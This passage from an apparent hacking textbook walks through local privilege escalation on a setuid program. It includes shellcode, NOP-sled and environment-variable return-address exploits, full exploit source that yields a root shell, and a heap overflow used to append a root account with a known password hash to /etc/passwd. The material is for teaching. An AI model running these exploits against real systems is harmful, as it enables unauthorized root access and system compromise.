"\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68"
"\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89"
"\xe1\xcd\x80";

int main(int argc, char *argv[]) {
   unsigned int i, *ptr, ret, offset=270;
reader@hacking:~/booksrc $ head exploit_notesearch.c | grep "^\""
"\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68"
"\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89"
"\xe1\xcd\x80";
reader@hacking:~/booksrc $ head exploit_notesearch.c | grep "^\"" | cut -d\" -f2
\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68
\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89
\xe1\xcd\x80
reader@hacking:~/booksrc $

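The first 10 lines of the program are piped into grep, which only shows the lines that begin with a quotation mark. This isolates the lines containing the shellcode, which are then piped into cut with options that display only the bytes between two quotation marks.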

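BASH's for loop can be used to send each of these lines to an echo command, with command-line options to recognize hex expansion and to suppress the trailing newline.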

reader@hacking:~/booksrc $ for i in $(head exploit_notesearch.c | grep "^\"" | cut -d\" -f2)
> do
> echo -en $i
> done > shellcode.bin
reader@hacking:~/booksrc $ hexdump -C shellcode.bin 
00000000  31 c0 31 db 31 c9 99 b0  a4 cd 80 6a 0b 58 51 68  |1.1.1......j.XQh|
00000010  2f 2f 73 68 68 2f 62 69  6e 89 e3 51 89 e2 53 89  |//shh/bin..Q..S.|
00000020  e1 cd 80                                          |...|
00000023 
reader@hacking:~/booksrc $
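The echo -en step above turns text such as \x31\xc0 into raw bytes. As a rough C counterpart, the sketch below decodes the same \xNN notation into a byte buffer. The names hex_val and decode_hex_escapes are hypothetical helpers introduced only for illustration; they handle nothing but \xNN escapes and are not meant as a replacement for the shell pipeline.

```c
#include <assert.h>
#include <ctype.h>
#include <stddef.h>

/* Value of one hex digit, or -1 if c is not a hex digit. */
static int hex_val(int c)
{
    if (c >= '0' && c <= '9')
        return c - '0';
    c = tolower(c);
    if (c >= 'a' && c <= 'f')
        return c - 'a' + 10;
    return -1;
}

/* Decodes text made only of \xNN escapes into out (capacity cap).
 * Returns the number of bytes written, or -1 on malformed input
 * or when out is too small. */
long decode_hex_escapes(const char *text, unsigned char *out, size_t cap)
{
    size_t n = 0;

    assert(text != NULL && out != NULL);
    while (*text != '\0') {
        int hi, lo;

        if (text[0] != '\\' || text[1] != 'x')
            return -1;
        hi = hex_val((unsigned char)text[2]);
        if (hi < 0)
            return -1;
        lo = hex_val((unsigned char)text[3]);
        if (lo < 0)
            return -1;
        if (n == cap)
            return -1;
        out[n++] = (unsigned char)(hi * 16 + lo);
        text += 4;   /* skip past one complete \xNN group */
    }
    return (long)n;
}
```

Fed the three shellcode lines from the cut output one after another, a decoder like this would produce the same 35 bytes that hexdump shows in shellcode.bin.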

Now we have the shellcode in a file called shellcode.bin. This can be used with command substitution to put the shellcode into an environment variable, along with a generous NOP sled.

reader@hacking:~/booksrc $ export SHELLCODE=$(perl -e 'print "\x90"x200')$(cat shellcode.bin)
reader@hacking:~/booksrc $ echo $SHELLCODE
␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣
␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣
␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣1␣1␣1␣␣␣ j
                                     XQh//shh/bin␣␣Q␣␣S␣␣
reader@hacking:~/booksrc $

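And just like that, the shellcode is now on the stack in an environment variable, along with a 200-byte NOP sled. This means we only need to find an address somewhere within that sled to overwrite the saved return address with. The environment variables are located near the bottom of the stack, so that is where we should look when running notesearch in a debugger.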

reader@hacking:~/booksrc $ gdb -q ./notesearch
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
(gdb) break main
Breakpoint 1 at 0x804873c
(gdb) run
Starting program: /home/reader/booksrc/notesearch

Breakpoint 1, 0x0804873c in main ()
(gdb)

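A breakpoint is set at the beginning of main(), and the program is run. This sets up memory for the program but stops before anything happens. Now we can examine memory down near the bottom of the stack.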

(gdb) i r esp
esp            0xbffff660      0xbffff660
(gdb) x/24s $esp + 0x240
0xbffff8a0:      ""
0xbffff8a1:      ""
0xbffff8a2:      ""
0xbffff8a3:      ""
0xbffff8a4:      ""
0xbffff8a5:      ""
0xbffff8a6:      ""
0xbffff8a7:      ""
0xbffff8a8:      ""
0xbffff8a9:      ""
0xbffff8aa:      ""
0xbffff8ab:      "i686"
0xbffff8b0:      "/home/reader/booksrc/notesearch"
0xbffff8d0:      "SSH_AGENT_PID=7531"
`0xbffff8e3:      "SHELLCODE=", '\220' <repeats 190 times>...`
0xbffff9ab:      "\220\220\220\220\220\220\220\220\220\2201�1�1�\231���\200j\vXQh//shh/bin\211�Q\211�S\211��\200"
0xbffff9d9:      "TERM=xterm"
0xbffff9e4:      "DESKTOP_STARTUP_ID="
0xbffff9f8:      "SHELL=/bin/bash"
0xbffffa08:      "GTK_RC_FILES=/etc/gtk/gtkrc:/home/reader/.gtkrc-1.2-gnome2"
0xbffffa43:      "WINDOWID=39845969"
0xbffffa55:      "USER=reader"
0xbffffa61:
"LS_COLORS=no=00:fi=00:di=01;34:ln=01;36:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;
33;01:or=
40;31;01:su=37;41:sg=30;43:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:
*.arj=01
;31:*.taz=0"...
0xbffffb29:
"1;31:*.lzh=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.gz=01;31:*.bz2=01;31:*.deb=01;31:
*.rpm=01;3
1:*.jar=01;31:*.jpg=01;35:*.jpeg=01;35:*.gif=01;35:*.bmp=01;35:*.pbm=01;35:*.pgm=01;35:
*.ppm=01
;35:*.tga=0"...
(gdb) x/s 0xbffff8e3
0xbffff8e3:      "SHELLCODE=", '\220' <repeats 190 times>...
(gdb) x/s 0xbffff8e3 + 100
0xbffff947:      '\220' <repeats 110 times>, "1�1�1�\231���\200j\vXQh//shh/bin\211�Q\211�S\211��\200"
(gdb)

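The debugger reveals the location of the shellcode, shown in bold above. (When the program is run outside of the debugger, these addresses might be a little different.) The debugger also keeps some information of its own on the stack, which shifts the addresses around a bit. But with a 200-byte NOP sled, these slight inconsistencies aren't a problem if an address near the middle of the sled is picked. In the output above, the address 0xbffff947 is shown to be close to the middle of the NOP sled, which should give us enough wiggle room. After determining the address of the injected shellcode instructions, the exploitation is simply a matter of overwriting the return address with this address.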

reader@hacking:~/booksrc $ ./notesearch $(perl -e 'print "\x47\xf9\xff\xbf"x40')
[DEBUG] found a 34 byte note for user id 999
[DEBUG] found a 41 byte note for user id 999
-------[ end of note data ]-------
sh-3.2# whoami
root 
sh-3.2#

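The target address is repeated enough times to overflow the return address, and execution returns into the NOP sled in the environment variable, which inevitably leads to the shellcode. In situations where the overflow buffer isn't large enough to hold shellcode, an environment variable can be used with a large NOP sled. This usually makes exploitation quite a bit easier.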
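The Perl one-liner writes the address 0xbffff947 as the bytes \x47\xf9\xff\xbf because x86 stores multi-byte values in little-endian order. The following sketch shows that byte ordering and the 40-fold repetition in C; pack_le32 and fill_with_address are hypothetical names chosen for this illustration.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Stores addr least-significant byte first, which is how a 32-bit
 * x86 return address is laid out in memory. */
void pack_le32(uint32_t addr, unsigned char out[4])
{
    out[0] = (unsigned char)(addr & 0xff);
    out[1] = (unsigned char)((addr >> 8) & 0xff);
    out[2] = (unsigned char)((addr >> 16) & 0xff);
    out[3] = (unsigned char)((addr >> 24) & 0xff);
}

/* Fills buf with count back-to-back copies of addr.
 * buf must have room for 4 * count bytes. */
void fill_with_address(unsigned char *buf, size_t count, uint32_t addr)
{
    assert(buf != NULL);
    for (size_t i = 0; i < count; i++)
        pack_le32(addr, buf + 4 * i);
}
```

Calling fill_with_address(buf, 40, 0xbffff947) yields the same 160 bytes that the perl -e 'print "\x47\xf9\xff\xbf"x40' command prints.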

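A huge NOP sled is a great aid when you need to guess at the target return address, but it turns out that the locations of environment variables are easier to predict than the locations of local stack variables. C's standard library has a function called getenv(), which accepts the name of an environment variable as its only argument and returns that variable's memory address. The code in getenv_example.c demonstrates the use of getenv().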

`getenv_example.c`

#include <stdio.h>
#include <stdlib.h>

int main(int argc, char *argv[]) {
   printf("%s is at %p\n", argv[1], getenv(argv[1]));
}

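When compiled and run, this program displays the location of a given environment variable in its own memory. This gives a much more accurate prediction of where the same environment variable will be when the target program is run.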

reader@hacking:~/booksrc $ gcc getenv_example.c
reader@hacking:~/booksrc $ ./a.out SHELLCODE
SHELLCODE is at 0xbffff90b
reader@hacking:~/booksrc $ ./notesearch $(perl -e 'print "\x0b\xf9\xff\xbf"x40')
[DEBUG] found a 34 byte note for user id 999
[DEBUG] found a 41 byte note for user id 999
-------[ end of note data ]------- 
sh-3.2#

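This is accurate enough with a large NOP sled, but when the same thing is attempted without a sled, the program crashes. This means the environment prediction is still slightly off.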

reader@hacking:~/booksrc $ export SLEDLESS=$(cat shellcode.bin)
reader@hacking:~/booksrc $ ./a.out SLEDLESS
SLEDLESS is at 0xbfffff46
reader@hacking:~/booksrc $ ./notesearch $(perl -e 'print "\x46\xff\xff\xbf"x40')
[DEBUG] found a 34 byte note for user id 999
[DEBUG] found a 41 byte note for user id 999
-------[ end of note data ]-------
Segmentation fault
reader@hacking:~/booksrc $

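In order to predict an exact memory address, the differences between the addresses must be explored. The length of the name of the program being executed seems to have an effect on the address of the environment variables. This effect can be explored further by changing the name of the program and experimenting. This type of experimentation and pattern recognition is an important skill for a hacker to have.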

reader@hacking:~/booksrc $ cp a.out a
reader@hacking:~/booksrc $ ./a SLEDLESS
SLEDLESS is at 0xbfffff4e
reader@hacking:~/booksrc $ cp a.out bb
reader@hacking:~/booksrc $ ./bb SLEDLESS
SLEDLESS is at 0xbfffff4c
reader@hacking:~/booksrc $ cp a.out ccc
reader@hacking:~/booksrc $ ./ccc SLEDLESS
SLEDLESS is at 0xbfffff4a
reader@hacking:~/booksrc $ ./a.out SLEDLESS
SLEDLESS is at 0xbfffff46
reader@hacking:~/booksrc $ gdb -q
(gdb) p 0xbfffff4e - 0xbfffff46
$1 = 8
(gdb) quit
reader@hacking:~/booksrc $

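As the preceding experiment shows, the length of the name of the executing program affects the location of exported environment variables. The general trend seems to be a decrease of two bytes in the address of the environment variable for every single-byte increase in the length of the program name. This holds true for the program name a.out, since the difference in length between the names a.out and a is four bytes, and the difference between the addresses 0xbfffff4e and 0xbfffff46 is eight bytes. This must mean the name of the executing program is also located on the stack somewhere, which causes the shifting.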
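The two-bytes-per-character trend can be written down as a small formula and checked against the addresses in the transcript. The sketch below does this with signed arithmetic; predict_env_addr is a hypothetical name, the program names are assumed to be passed exactly as they were typed on the command line (for example ./a.out), and the factor of 2 is only the empirical value observed in this environment.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

/* Given the address observed from a program invoked as observer_name,
 * estimates the address the same variable would have in a program
 * invoked as target_name, assuming the address moves down by 2 bytes
 * for every extra character in the program name. */
uint32_t predict_env_addr(uint32_t observed, const char *observer_name,
                          const char *target_name)
{
    long delta;

    assert(observer_name != NULL && target_name != NULL);
    delta = (long)strlen(observer_name) - (long)strlen(target_name);
    return (uint32_t)((int64_t)observed + 2 * delta);
}
```

Starting from the 0xbfffff46 reported by ./a.out, this reproduces 0xbfffff4e for ./a, 0xbfffff4c for ./bb, and 0xbfffff4a for ./ccc.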

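Armed with this knowledge, the exact address of the environment variable can be predicted for the moment the vulnerable program is executed. This means the crutch of a NOP sled can be eliminated. The getenvaddr.c program adjusts the address based on the difference in program name length to provide a very accurate prediction.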

getenvaddr.c

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char *argv[]) {
   char *ptr;

   if(argc < 3) {
      printf("Usage: %s <environment var> <target program name>\n", argv[0]);
      exit(0);
   }
   ptr = getenv(argv[1]); /* Get env var location. */
   ptr += (strlen(argv[0]) - strlen(argv[2]))*2; /* Adjust for program name. */
   printf("%s will be at %p\n", argv[1], ptr);
}

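When compiled, this program can accurately predict where an environment variable will be in memory during a target program's execution. This can be used to exploit stack-based buffer overflows without the need for a NOP sled.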

reader@hacking:~/booksrc $ gcc -o getenvaddr getenvaddr.c
reader@hacking:~/booksrc $ ./getenvaddr SLEDLESS ./notesearch
SLEDLESS will be at 0xbfffff3c
reader@hacking:~/booksrc $ ./notesearch $(perl -e 'print "\x3c\xff\xff\xbf"x40')
[DEBUG] found a 34 byte note for user id 999
[DEBUG] found a 41 byte note for user id 999

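As you can see, exploit code isn't always needed to exploit programs. The use of environment variables simplifies things considerably when exploiting from the command line, but these variables can also be used to make exploit code more reliable.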

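In the exploit_notesearch.c program, the system() function is used to execute a command. This function starts a new process and runs the command using /bin/sh -c. The -c option tells the sh program to execute the command passed to it as a command-line argument. Google's code search can be used to find the source code for this function, which will tell us more. Go to www.google.com/codesearch?q=package:libc+system to see this code in its entirety.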

Code from libc-2.2.2

int system(const char * cmd)
{
        int ret, pid, waitstat;
        void (*sigint) (), (*sigquit) ();

        `if ((pid = fork()) == 0) {`
        `        execl("/bin/sh", "sh", "-c", cmd, NULL);`
        `        exit(127);`
        `}`
        if (pid < 0) return(127 << 8);
        sigint = signal(SIGINT, SIG_IGN);
        sigquit = signal(SIGQUIT, SIG_IGN);
        while ((waitstat = wait(&ret)) != pid && waitstat != -1);
        if (waitstat == -1) ret = -1;
        signal(SIGINT, sigint);
        signal(SIGQUIT, sigquit);
        return(ret);
}

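The important part of this function is shown in bold. The fork() function starts a new process, and the execl() function is used to run the command through /bin/sh with the appropriate command-line arguments.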

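The use of system() can sometimes cause problems. If a setuid program uses system(), the privileges won't be transferred, because /bin/sh has been dropping privileges since version two. This isn't the case with our exploit, but the exploit doesn't really need to start a new process, either. We can ignore the fork() and just focus on the execl() function to run the command.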

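The execl() function belongs to a family of functions that execute commands by replacing the current process with the new one. The arguments for execl() start with the path to the target program, followed by each of the command-line arguments. The second function argument is actually the zeroth command-line argument, which is the name of the program. The last argument is a NULL that terminates the argument list, similar to how a null byte terminates a string.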

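The execl() function has a sister function called execle(), which has one additional argument to specify the environment under which the executing process should run. This environment is presented as an array of pointers to null-terminated strings, one for each environment variable, and the environment array itself is terminated with a NULL pointer.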
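To make the execle() calling convention concrete, the sketch below runs a short shell script in a child process whose environment contains exactly one entry. It is a harmless demonstration under stated assumptions: run_with_single_env is a hypothetical helper, /bin/sh is assumed to exist, and fork() is used here only so the caller survives to inspect the exit status.

```c
#include <assert.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Runs "sh -c script" in a child whose environment holds only
 * env_entry (a "NAME=value" string). Returns the child's exit
 * status, or -1 if the child could not be run or did not exit
 * normally. */
int run_with_single_env(const char *script, const char *env_entry)
{
    /* The environment array: one string, then the NULL terminator. */
    char *const env[] = { (char *)env_entry, NULL };
    pid_t pid;
    int status;

    assert(script != NULL && env_entry != NULL);
    pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        /* path, argv[0], argv[1], argv[2], NULL sentinel, environment */
        execle("/bin/sh", "sh", "-c", script, (char *)NULL, env);
        _exit(127);   /* reached only if execle() failed */
    }
    if (waitpid(pid, &status, 0) != pid)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```

For example, run_with_single_env("test \"$DEMO\" = hello", "DEMO=hello") returns 0, because the child sees the single variable that was passed in the environment array.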

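With execl(), the existing environment is used, but with execle(), the entire environment can be specified. If the environment array is just the shellcode as the first string (with a NULL pointer to terminate the list), the only environment variable will be the shellcode. This makes its address easy to calculate. In Linux, the address will be 0xbffffffa, minus the length of the shellcode in the environment, minus the length of the name of the executed program. Since this address will be exact, there is no need for a NOP sled. All that's needed in the exploit buffer is the address, repeated enough times to overflow the return address on the stack, as shown in exploit_notesearch_env.c.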

exploit_notesearch_env.c

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

char shellcode[]=
"\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68"
"\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89"
"\xe1\xcd\x80";

int main(int argc, char *argv[]) {
   char *env[2] = {shellcode, 0};
   unsigned int i, ret;

   char *buffer = (char *) malloc(160);

   ret = 0xbffffffa - (sizeof(shellcode)-1) - strlen("./notesearch");
   for(i=0; i < 160; i+=4)
      *((unsigned int *)(buffer+i)) = ret;

   execle("./notesearch", "notesearch", buffer, 0, env);
   free(buffer);
}

This exploit is more reliable, since it doesn't need a NOP sled or any guesswork regarding offsets. It also doesn't start any additional processes.

reader@hacking:~/booksrc $ gcc exploit_notesearch_env.c
reader@hacking:~/booksrc $ ./a.out
-------[ end of note data ]------- 
sh-3.2#
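The address that exploit_notesearch_env.c computes can be worked through by hand. The shellcode is 35 bytes long (the hexdump of shellcode.bin ends at 0x23) and ./notesearch is 12 characters, so the result is 0xbffffffa - 35 - 12 = 0xbfffffcb. The sketch below repeats that arithmetic; lone_env_addr is a hypothetical name, and the constant 0xbffffffa is taken from the text as a property of the book's 32-bit Linux environment, not a general rule.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

/* Address of the only environment string, following the rule stated
 * in the text: 0xbffffffa minus the payload length minus the length
 * of the executed program's path. */
uint32_t lone_env_addr(size_t payload_len, const char *program_path)
{
    assert(program_path != NULL);
    return (uint32_t)(0xbffffffau - (uint32_t)payload_len
                      - (uint32_t)strlen(program_path));
}
```

With a payload length of 35 and the path ./notesearch, the function returns 0xbfffffcb, which is the value the exploit writes repeatedly into its buffer.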

Overflows in Other Segments

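Buffer overflows can happen in other memory segments, like the heap and bss. As in auth_overflow.c, if an important variable is located after a buffer vulnerable to an overflow, the program's control flow can be altered. This is true regardless of the memory segment these variables reside in; however, the control tends to be quite limited. Finding these control points and learning to make the most of them just takes some experience and creative thinking. While these types of overflows aren't as standardized as stack-based overflows, they can be just as effective.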

A Basic Heap-Based Overflow

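The notetaker program from Chapter 0x200 is also susceptible to a buffer overflow vulnerability. Two buffers are allocated on the heap, and the first command-line argument is copied into the first buffer. An overflow can occur here.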

Excerpt from notetaker.c

   buffer = (char *) ec_malloc(100);
   datafile = (char *) ec_malloc(20);
   strcpy(datafile, "/var/notes");

   if(argc < 2)                // If there aren't command-line arguments,
      usage(argv[0], datafile); // display usage message and exit.

   `strcpy(buffer, argv[1]);  // Copy into buffer.`

   printf("[DEBUG] buffer   @ %p: \'%s\'\n", buffer, buffer);
   printf("[DEBUG] datafile @ %p: \'%s\'\n", datafile, datafile);

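Under normal conditions, the buffer allocation is located at 0x804a008, which is before the datafile allocation at 0x804a070, as the debugging output shows. The distance between these two addresses is 104 bytes.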

reader@hacking:~/booksrc $ ./notetaker test
[DEBUG] buffer   @ 0x804a008: 'test'
[DEBUG] datafile @ 0x804a070: '/var/notes'
[DEBUG] file descriptor is 3
Note has been saved.
reader@hacking:~/booksrc $ gdb -q
(gdb) p 0x804a070 - 0x804a008
$1 = 104
(gdb) quit
reader@hacking:~/booksrc $

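Since the first buffer is null terminated, the maximum amount of data that can be put into this buffer without overflowing into the next should be 104 bytes.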

reader@hacking:~/booksrc $ ./notetaker $(perl -e 'print "A"x104')
[DEBUG] buffer   @ 0x804a008: 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
[DEBUG] datafile @ 0x804a070: ''
[!!] Fatal Error in main() while opening file: No such file or directory
reader@hacking:~/booksrc $

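As predicted, when 104 bytes are tried, the null-termination byte overflows into the beginning of the datafile buffer. This causes datafile to be nothing but a single null byte, which obviously cannot be opened as a file. But what if the datafile buffer is overwritten with something more than just a null byte?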

reader@hacking:~/booksrc $ ./notetaker $(perl -e 'print "A"x104 . "testfile"')
[DEBUG] buffer   @ 0x804a008: 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAtestfile'
[DEBUG] datafile @ 0x804a070: 'testfile'
[DEBUG] file descriptor is 3
Note has been saved.
*** glibc detected *** ./notetaker: free(): invalid next size (normal): 0x0804a008 ***
======= Backtrace: =========
/lib/tls/i686/cmov/libc.so.6[0xb7f017cd]
/lib/tls/i686/cmov/libc.so.6(cfree+0x90)[0xb7f04e30]
./notetaker[0x8048916]
/lib/tls/i686/cmov/libc.so.6(__libc_start_main+0xdc)[0xb7eafebc]
./notetaker[0x8048511]
======= Memory map: ========
08048000-08049000 r-xp 00000000 00:0f 44384      /cow/home/reader/booksrc/notetaker
08049000-0804a000 rw-p 00000000 00:0f 44384      /cow/home/reader/booksrc/notetaker
0804a000-0806b000 rw-p 0804a000 00:00 0          [heap]
b7d00000-b7d21000 rw-p b7d00000 00:00 0
b7d21000-b7e00000 ---p b7d21000 00:00 0
b7e83000-b7e8e000 r-xp 00000000 07:00 15444      /rofs/lib/libgcc_s.so.1
b7e8e000-b7e8f000 rw-p 0000a000 07:00 15444      /rofs/lib/libgcc_s.so.1
b7e99000-b7e9a000 rw-p b7e99000 00:00 0
b7e9a000-b7fd5000 r-xp 00000000 07:00 15795      /rofs/lib/tls/i686/cmov/libc-2.5.so
b7fd5000-b7fd6000 r--p 0013b000 07:00 15795      /rofs/lib/tls/i686/cmov/libc-2.5.so
b7fd6000-b7fd8000 rw-p 0013c000 07:00 15795      /rofs/lib/tls/i686/cmov/libc-2.5.so
b7fd8000-b7fdb000 rw-p b7fd8000 00:00 0
b7fe4000-b7fe7000 rw-p b7fe4000 00:00 0
b7fe7000-b8000000 r-xp 00000000 07:00 15421      /rofs/lib/ld-2.5.so
b8000000-b8002000 rw-p 00019000 07:00 15421      /rofs/lib/ld-2.5.so
bffeb000-c0000000 rw-p bffeb000 00:00 0          [stack]
ffffe000-fffff000 r-xp 00000000 00:00 0          [vdso]
Aborted
reader@hacking:~/booksrc $

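This time, the overflow is designed to overwrite the datafile buffer with the string testfile. This causes the program to write to testfile instead of /var/notes, as it was originally programmed to do. However, when the heap memory is released by the free() call, errors in the heap headers are detected and the program is terminated. Similar to the return address overwrite with stack overflows, there are control points within the heap architecture itself. The most recent version of glibc uses heap memory management functions that have evolved specifically to counter heap unlinking attacks. Since version 2.2.5, these functions have been rewritten to print debugging information and terminate the program when they detect problems with the heap header information. This makes heap unlinking in Linux very difficult. However, this particular exploit doesn't use heap header information to do its magic, so by the time free() is called, the program has already been tricked into writing to a new file with root privileges.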
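The effect seen in the two transcripts can be reproduced safely in a model that never writes outside its own memory. The sketch below lays the two buffers out in one flat array, 104 bytes apart as in the debug output, and performs the same unchecked strcpy(). The names simulate_overflow, BUFFER_GAP, DATAFILE_LEN, and ARENA_LEN are hypothetical, and the flat array is only a stand-in for the real heap layout, which also contains allocator headers.

```c
#include <assert.h>
#include <string.h>

#define BUFFER_GAP   104  /* distance between the two allocations */
#define DATAFILE_LEN 20   /* size requested for datafile */
#define ARENA_LEN    (BUFFER_GAP + DATAFILE_LEN)

/* Copies input into the start of a flat arena whose last DATAFILE_LEN
 * bytes model the datafile allocation, then reports what datafile
 * holds afterward. */
void simulate_overflow(const char *input, char datafile_out[DATAFILE_LEN])
{
    char arena[ARENA_LEN];
    char *buffer = arena;
    char *datafile = arena + BUFFER_GAP;

    assert(input != NULL);
    assert(strlen(input) < ARENA_LEN);  /* keep the model itself in bounds */

    memset(arena, 0, sizeof arena);
    strcpy(datafile, "/var/notes");
    strcpy(buffer, input);              /* the unchecked copy, as in notetaker.c */

    memcpy(datafile_out, datafile, DATAFILE_LEN);
    datafile_out[DATAFILE_LEN - 1] = '\0';
}
```

A short input leaves datafile as /var/notes, exactly 104 A characters turn it into an empty string, and 104 A characters followed by testfile replace it with testfile, matching the three runs of notetaker shown above.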

reader@hacking:~/booksrc $ grep -B10 free notetaker.c

   if(write(fd, buffer, strlen(buffer)) == -1) // Write note.
      fatal("in main() while writing buffer to file");
   write(fd, "\n", 1); // Terminate line.

// Closing file
   if(close(fd) == -1)
      fatal("in main() while closing file");

   printf("Note has been saved.\n");
   free(buffer);
   free(datafile);
reader@hacking:~/booksrc $ ls -l ./testfile
-rw------- 1 root reader 118 2007-09-09 16:19 ./testfile
reader@hacking:~/booksrc $ cat ./testfile
cat: ./testfile: Permission denied
reader@hacking:~/booksrc $ sudo cat ./testfile
?
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAA
AAAAAAAAAtestfile
reader@hacking:~/booksrc $

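A string is read until a null byte is encountered, so the entire string is written to the file as the userinput. Since this is a suid root program, the file that is created is owned by root. It also means that, since the filename can be controlled, data can be appended to any file. This data does have some restrictions, though: it must end with the controlled filename, and a line with the user ID will be written, too.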

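There are probably several clever ways to exploit this type of capability. The most apparent one is to append something to the /etc/passwd file. This file contains the usernames, IDs, and login shells for all the users of the system. Naturally, this is a critical system file, so it is a good idea to make a backup copy before messing with it too much.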

reader@hacking:~/booksrc $ cp /etc/passwd /tmp/passwd.bkup
reader@hacking:~/booksrc $ head /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
reader@hacking:~/booksrc $

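The fields in the /etc/passwd file are delimited by colons: the first field is the login name, followed by the password, user ID, group ID, username, home directory, and finally the login shell. The password fields are all filled with the x character, since the encrypted passwords are stored elsewhere in a shadow file. (However, this field can contain the encrypted password.) In addition, any entry in the password file that has a user ID of 0 will be given root privileges. That means the goal is to append an extra entry with both root privileges and a known password to the password file.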
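The colon-delimited layout described above is simple enough to pick apart by hand. The following sketch extracts one field from a password-file line and checks whether the user ID field is 0; passwd_field and entry_has_root_uid are hypothetical helpers written for this illustration and are not how the system's login code is implemented.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Copies the colon-delimited field number index (0-based) of line
 * into out. Returns 0 on success, -1 if the field does not exist
 * or does not fit in cap bytes. */
int passwd_field(const char *line, int index, char *out, size_t cap)
{
    const char *start = line;
    const char *end;
    size_t len;

    assert(line != NULL && out != NULL && cap > 0 && index >= 0);
    while (index > 0) {
        start = strchr(start, ':');
        if (start == NULL)
            return -1;
        start++;          /* step past the colon */
        index--;
    }
    end = strchr(start, ':');
    len = end ? (size_t)(end - start) : strlen(start);
    if (len >= cap)
        return -1;
    memcpy(out, start, len);
    out[len] = '\0';
    return 0;
}

/* Returns 1 if the user ID field (field 2) is exactly "0". */
int entry_has_root_uid(const char *line)
{
    char uid[16];

    if (passwd_field(line, 2, uid, sizeof uid) != 0)
        return 0;
    return strcmp(uid, "0") == 0;
}
```

Applied to the reader entry from the password file, entry_has_root_uid() returns 0, while any line whose third field is 0 is reported as a root-level account.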

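The password can be encrypted using a one-way hashing algorithm. Because the algorithm is one way, the original password cannot be recreated from the hash value. To prevent lookup attacks, the algorithm uses a salt value, which when varied creates a different hash value for the same input password. This is a common operation, and Perl has a crypt() function that performs it. The first argument is the password, and the second is the salt value. The same password with a different salt produces a different hash.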

reader@hacking:~/booksrc $ perl -e 'print crypt("password", "AA"). "\n"'
AA6tQYSfGxd/A
reader@hacking:~/booksrc $ perl -e 'print crypt("password", "XX"). "\n"'
XXq2wKiyI43A2
reader@hacking:~/booksrc $

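Notice that the salt value is always at the beginning of the hash. When a user logs in and enters a password, the system looks up the encrypted password for that user. Using the salt value from the stored encrypted password, the system uses the same one-way hashing algorithm to encrypt whatever text the user typed as the password. Finally, the system compares the two hashes; if they are the same, the user must have entered the correct password. This allows the password to be used for authentication without requiring that the password itself be stored anywhere on the system.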

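Using one of these hashes in the password field will make the password for the account be password, regardless of the salt value used. The line to append to /etc/passwd should look something like this: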

myroot:XXq2wKiyI43A2:0:0:me:/root:/bin/bash

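However, the nature of this particular heap overflow exploit won't allow that exact line to be written to /etc/passwd, because the string must end with /etc/passwd. If that filename were merely appended to the end of the entry, the password file entry would be incorrect. This can be compensated for with the clever use of a symbolic file link, so the entry can both end with /etc/passwd and still be a valid line in the password file. Here's how it works: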

reader@hacking:~/booksrc $ mkdir /tmp/etc
reader@hacking:~/booksrc $ ln -s /bin/bash /tmp/etc/passwd
reader@hacking:~/booksrc $ ls -l /tmp/etc/passwd
lrwxrwxrwx 1 reader reader 9 2007-09-09 16:25 /tmp/etc/passwd -> /bin/bash
reader@hacking:~/booksrc $

Now /tmp/etc/passwd points to the login shell /bin/bash. This means that /tmp/etc/passwd is also a valid login shell for the password file, which makes the following a valid password file line:

